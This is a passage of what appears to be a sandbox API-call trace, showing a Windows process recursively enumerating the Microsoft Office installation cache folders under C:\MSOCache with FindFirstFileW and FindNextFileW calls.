ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.978] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0066.978] FindNextFileW (in: hFindFile=0x5a3f78, lpFindFileData=0x5bac68 | out: lpFindFileData=0x5bac68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe874f770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263400, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerPointMUI.msi", cAlternateFileName="POWERP~1.MSI")) returned 1 [0066.978] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0066.995] lstrlenW (lpString="PowerPointMUI.msi") returned 17 [0067.002] FindClose (hFindFile=0x5a3f78) [0067.002] FindClose (in: hFindFile=0x5a3f78 | out: hFindFile=0x5a3f78) returned 1 [0067.002] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bac68 | out: hHeap=0x580000) returned 1 [0067.002] FindNextFileW (in: hFindFile=0x5a3f38, lpFindFileData=0x5b81f0 | out: lpFindFileData=0x5b81f0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0019-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9877A~1")) returned 1 [0067.002] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.004] lstrlenW (lpString="{90140000-0019-0409-1000-0000000FF1CE}-C") returned 40 [0067.004] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x5b9860 | out: lpFindFileData=0x5b9860*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x300030, dwReserved1=0x380031, cFileName=".", cAlternateFileName="")) returned 0x5a3f78 [0067.175] FindNextFileW (in: hFindFile=0x5a3f78, lpFindFileData=0x5b9860 | out: lpFindFileData=0x5b9860*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x300030, dwReserved1=0x380031, cFileName="..", cAlternateFileName="")) returned 1 [0067.176] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.176] FindNextFileW (in: hFindFile=0x5a3f78, lpFindFileData=0x5b9860 | out: lpFindFileData=0x5b9860*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc40b730, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x265c00, dwReserved0=0x300030, dwReserved1=0x380031, cFileName="PublisherMUI.msi", cAlternateFileName="PUBLIS~1.MSI")) returned 1 [0067.176] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.176] lstrlenW (lpString="PublisherMUI.msi") returned 16 [0067.182] FindClose (hFindFile=0x5a3f78) [0067.182] FindClose (in: hFindFile=0x5a3f78 | out: hFindFile=0x5a3f78) returned 1 [0067.182] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b9860 | out: hHeap=0x580000) returned 1 [0067.182] FindNextFileW (in: hFindFile=0x5a3f38, lpFindFileData=0x5b81f0 | out: lpFindFileData=0x5b81f0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-001A-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9765F~1")) returned 1 [0067.205] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.205] lstrlenW (lpString="{90140000-001A-0409-1000-0000000FF1CE}-C") returned 40 [0067.205] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x5bd1b0 | out: lpFindFileData=0x5bd1b0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x680063, dwReserved1=0x5c0065, cFileName=".", cAlternateFileName="")) returned 0x5a3f78 [0067.224] FindNextFileW (in: hFindFile=0x5a3f78, lpFindFileData=0x5bd1b0 | out: lpFindFileData=0x5bd1b0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x680063, dwReserved1=0x5c0065, cFileName="..", cAlternateFileName="")) returned 1 [0067.225] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.225] FindNextFileW (in: hFindFile=0x5a3f78, lpFindFileData=0x5bd1b0 | out: lpFindFileData=0x5bd1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3a6f2400, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3a6f2400, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xeebe0180, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xe21fcc, dwReserved0=0x680063, dwReserved1=0x5c0065, cFileName="OutlkLR.cab", cAlternateFileName="")) returned 1 [0067.225] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.225] lstrlenW (lpString="OutlkLR.cab") returned 11 [0067.225] FindClose (in: hFindFile=0x5a3f78 | out: hFindFile=0x5a3f78) returned 1 [0067.226] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bd1b0 | out: hHeap=0x580000) returned 1 [0067.226] FindNextFileW (in: hFindFile=0x5a3f38, lpFindFileData=0x5b81f0 | out: lpFindFileData=0x5b81f0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-001B-0409-1000-0000000FF1CE}-C", cAlternateFileName="{94E50~1")) returned 1 [0067.226] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.226] lstrlenW (lpString="{90140000-001B-0409-1000-0000000FF1CE}-C") returned 40 [0067.226] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName=".", cAlternateFileName="")) returned 0x5a3f78 [0067.255] FindNextFileW (in: hFindFile=0x5a3f78, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName="..", cAlternateFileName="")) returned 1 [0067.255] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.256] FindNextFileW (in: hFindFile=0x5a3f78, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x978, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0067.269] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.269] lstrlenW (lpString="Setup.xml") returned 9 [0067.270] FindClose (in: hFindFile=0x5a3f78 | out: hFindFile=0x5a3f78) returned 1 [0067.270] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ba860 | out: hHeap=0x580000) returned 1 [0067.270] FindNextFileW (in: hFindFile=0x5a3f38, lpFindFileData=0x5b81f0 | out: lpFindFileData=0x5b81f0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-002C-0409-1000-0000000FF1CE}-C", cAlternateFileName="{92787~1")) returned 1 [0067.270] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.270] lstrlenW (lpString="{90140000-002C-0409-1000-0000000FF1CE}-C") returned 40 [0067.270] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName=".", cAlternateFileName="")) returned 0x5b9808 [0067.281] FindNextFileW (in: hFindFile=0x5b9808, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName="..", cAlternateFileName="")) returned 1 [0067.282] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.282] FindNextFileW (in: hFindFile=0x5b9808, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf07b3a10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf07b3a10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName="Proof.en", cAlternateFileName="")) returned 1 [0067.282] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.282] lstrlenW (lpString="Proof.en") returned 8 [0067.282] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*", lpFindFileData=0x5befc0 | out: lpFindFileData=0x5befc0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf07b3a10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf07b3a10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bae60 [0067.282] FindNextFileW (in: hFindFile=0x5bae60, lpFindFileData=0x5befc0 | out: lpFindFileData=0x5befc0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf07b3a10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf07b3a10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.282] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.282] FindNextFileW (in: hFindFile=0x5bae60, lpFindFileData=0x5befc0 | out: lpFindFileData=0x5befc0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x219b4a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x219b4a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf07b1ad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xaf35ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.cab", cAlternateFileName="")) returned 1 [0067.282] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.282] lstrlenW (lpString="Proof.cab") returned 9 [0067.283] FindClose (in: hFindFile=0x5bae60 | out: hFindFile=0x5bae60) returned 1 [0067.283] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5befc0 | out: hHeap=0x580000) returned 1 [0067.283] FindNextFileW (in: hFindFile=0x5b9808, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf4f690d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName="Proof.es", cAlternateFileName="")) returned 1 [0067.283] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.283] lstrlenW (lpString="Proof.es") returned 8 [0067.283] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*", lpFindFileData=0x5befc0 | out: lpFindFileData=0x5befc0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf4f690d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bae60 [0067.283] FindNextFileW (in: hFindFile=0x5bae60, lpFindFileData=0x5befc0 | out: lpFindFileData=0x5befc0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf4f690d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.283] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.283] FindNextFileW (in: hFindFile=0x5bae60, lpFindFileData=0x5befc0 | out: lpFindFileData=0x5befc0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3ba05100, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3ba05100, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd02aea, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.cab", cAlternateFileName="")) returned 1 [0067.283] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.283] lstrlenW (lpString="Proof.cab") returned 9 [0067.283] FindClose (in: hFindFile=0x5bae60 | out: hFindFile=0x5bae60) returned 1 [0067.283] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5befc0 | out: hHeap=0x580000) returned 1 [0067.284] FindNextFileW (in: hFindFile=0x5b9808, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf30772d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf30772d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName="Proof.fr", cAlternateFileName="")) returned 1 [0067.284] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.284] lstrlenW (lpString="Proof.fr") returned 8 [0067.284] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*", lpFindFileData=0x5befc0 | out: lpFindFileData=0x5befc0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf30772d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf30772d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bae60 [0067.284] FindNextFileW (in: hFindFile=0x5bae60, lpFindFileData=0x5befc0 | out: lpFindFileData=0x5befc0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf30772d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf30772d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.284] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.284] FindNextFileW (in: hFindFile=0x5bae60, lpFindFileData=0x5befc0 | out: lpFindFileData=0x5befc0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x35aa7000, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x35aa7000, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf3076b00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1416b54, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.cab", cAlternateFileName="")) returned 1 [0067.284] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.284] lstrlenW (lpString="Proof.cab") returned 9 [0067.284] FindClose (in: hFindFile=0x5bae60 | out: hFindFile=0x5bae60) returned 1 [0067.284] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5befc0 | out: hHeap=0x580000) returned 1 [0067.284] FindNextFileW (in: hFindFile=0x5b9808, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x40650500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x40650500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf0126df0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName="Proofing.msi", cAlternateFileName="")) returned 1 [0067.284] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.284] lstrlenW (lpString="Proofing.msi") returned 12 [0067.285] FindClose (in: hFindFile=0x5b9808 | out: hFindFile=0x5b9808) returned 1 [0067.285] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ba860 | out: hHeap=0x580000) returned 1 [0067.285] FindNextFileW (in: hFindFile=0x5a3f38, lpFindFileData=0x5b81f0 | out: lpFindFileData=0x5b81f0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0043-0409-1000-0000000FF1CE}-C", cAlternateFileName="{95310~1")) returned 1 [0067.285] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.285] lstrlenW (lpString="{90140000-0043-0409-1000-0000000FF1CE}-C") returned 40 [0067.285] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName=".", cAlternateFileName="")) returned 0x5b9808 [0067.287] FindNextFileW (in: hFindFile=0x5b9808, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName="..", cAlternateFileName="")) returned 1 [0067.287] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.288] FindNextFileW (in: hFindFile=0x5b9808, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc138cb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd5600, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName="Office32MUI.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0067.288] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.288] lstrlenW (lpString="Office32MUI.msi") returned 15 [0067.288] FindClose (in: hFindFile=0x5b9808 | out: hFindFile=0x5b9808) returned 1 [0067.289] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ba860 | out: hHeap=0x580000) returned 1 [0067.289] FindNextFileW (in: hFindFile=0x5a3f38, lpFindFileData=0x5b81f0 | out: lpFindFileData=0x5b81f0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0044-0409-1000-0000000FF1CE}-C", cAlternateFileName="{91454~1")) returned 1 [0067.289] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.289] lstrlenW (lpString="{90140000-0044-0409-1000-0000000FF1CE}-C") returned 40 [0067.289] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName=".", cAlternateFileName="")) returned 0x5b9808 [0067.293] FindNextFileW (in: hFindFile=0x5b9808, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, 